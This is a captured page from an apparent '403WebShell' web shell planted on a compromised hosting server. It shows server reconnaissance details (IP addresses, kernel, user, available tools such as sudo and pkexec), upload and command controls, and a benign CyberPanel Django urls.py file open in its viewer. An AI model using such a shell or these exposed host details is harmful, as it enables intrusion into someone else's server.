Warning: chmod(): No such file or directory in /home/tuempresavirtual.cl/public_html/wp-content/plugins/appointment-hour-booking/app-booking-plugin.php on line 3
403WebShell
403Webshell
Server IP : 186.64.123.29  /  Your IP : 216.73.217.94
Web Server : LiteSpeed
System : Linux house.hostinglat.cl 5.15.0-185-generic #195-Ubuntu SMP Fri Jun 19 17:11:50 UTC 2026 x86_64
User : tuemp9827 ( 1016)
PHP Version : 8.1.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/local/CyberCP/userManagment/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/local/CyberCP/userManagment/urls.py
from django.urls import path
from . import views

urlpatterns = [
    path('', views.loadUserHome, name='loadUsersHome'),
    path('viewProfile', views.viewProfile, name='viewProfile'),
    path('createUser', views.createUser, name='createUser'),
    path('submitUserCreation', views.submitUserCreation, name='submitUserCreation'),
    path('modifyUsers', views.modifyUsers, name='modifyUsers'),
    path('fetchUserDetails', views.fetchUserDetails, name='fetchUserDetails'),
    path('saveModifications', views.saveModifications, name='saveModifications'),
    path('deleteUser', views.deleteUser, name='deleteUser'),
    path('submitUserDeletion', views.submitUserDeletion, name='submitUserDeletion'),
    path('createNewACL', views.createNewACL, name='createNewACL'),
    path('createACLFunc', views.createACLFunc, name='createACLFunc'),
    path('deleteACL', views.deleteACL, name='deleteACL'),
    path('deleteACLFunc', views.deleteACLFunc, name='deleteACLFunc'),
    path('modifyACL', views.modifyACL, name='modifyACL'),
    path('fetchACLDetails', views.fetchACLDetails, name='fetchACLDetails'),
    path('submitACLModifications', views.submitACLModifications, name='submitACLModifications'),
    path('changeUserACL', views.changeUserACL, name='changeUserACL'),
    path('changeACLFunc', views.changeACLFunc, name='changeACLFunc'),
    path('resellerCenter', views.resellerCenter, name='resellerCenter'),
    path('saveResellerChanges', views.saveResellerChanges, name='saveResellerChanges'),
    path('apiAccess', views.apiAccess, name='apiAccess'),
    path('saveChangesAPIAccess', views.saveChangesAPIAccess, name='saveChangesAPIAccess'),
    path('listUsers', views.listUsers, name='listUsers'),
    path('fetchTableUsers', views.fetchTableUsers, name='fetchTableUsers'),
    path('controlUserState', views.controlUserState, name='controlUserState'),
]

Youez - 2016 - github.com/yon3zu
LinuXploit